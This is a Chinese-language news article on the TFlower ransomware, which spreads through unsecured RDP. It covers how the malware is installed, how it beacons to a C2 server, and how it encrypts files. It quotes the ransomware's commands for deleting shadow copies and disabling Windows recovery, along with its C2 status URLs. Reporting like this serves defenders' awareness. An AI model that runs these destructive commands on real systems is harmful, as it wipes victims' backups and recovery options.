目標鎖定企業環境的最新勒索軟件被命名為“TFlower”,正通過未得到安全保護的遠程桌面服務(RDP)傳播。也就是說,它是在攻擊者通過RDP服務侵入受害者電腦後手動安裝的。
據外媒BleepingComputer報道,這種新型勒索軟件實際上是由白帽黑客GrujaRS在上個月初發現的,但直到最近才開始大規模爆發,一些企業和政府機構已經遭到感染。
通過RDP獲取電腦訪問權限
如上所述,TFlower在攻擊者通過未得到安全保護的RDP服務侵入受害者電腦後手動安裝的。
一旦攻擊者獲取到了對目標電腦的訪問權限,他們就會在本地安裝TFlower,甚至可能會通過PowerShell Empire、PSExec等工具來遍歷網絡。
TFlower勒索軟件的加密流程
在執行時,TFlower將顯示一個控制檯窗口,高調地展示它的加密過程。
然後,它將與命令和控制(C2)服務器建立通信,以便進行狀態檢查。在BleepingComputer看到的一個樣本中,C2服務器是一個被黑掉的Wordpress網站,並使用瞭如下地址:
https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=start
接下來,它將嘗試刪除卷影副本,並執行禁用Windows 10修復環境的命令。
vssadmin.exe delete shadows /all /quiet
bcdedit.exe /set {default} recoveryenabled no
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {current} recoveryenabled no
bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures
此外,它還會查找並殺死Outlook.exe進程,以便允許打開其數據文件打開進行加密。
緊接著,它將繼續加密受感染電腦上的文件(會跳過Windows或Sample Music文件夾)。
加密文件時,它不會添加額外擴展名,但會添加“* tflower”標記以及該文件的加密密鑰(經過加密處理),如下所示。
加密完成後,它將以如下形式向C2服務器發送另一個狀態更新:
https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=success%20[encrypted_file_count],%20retry%20[retried_file_count]
最後,一個名為“!_Notice_!.txt”的贖金票據就會出現在受感染電腦的桌面上。
到目前為止,針對TFlower勒索軟件的研究仍在進行當中,因此尚沒有可以用來免費恢復被其加密文件的方法。
閱讀更多 黑客視界 的文章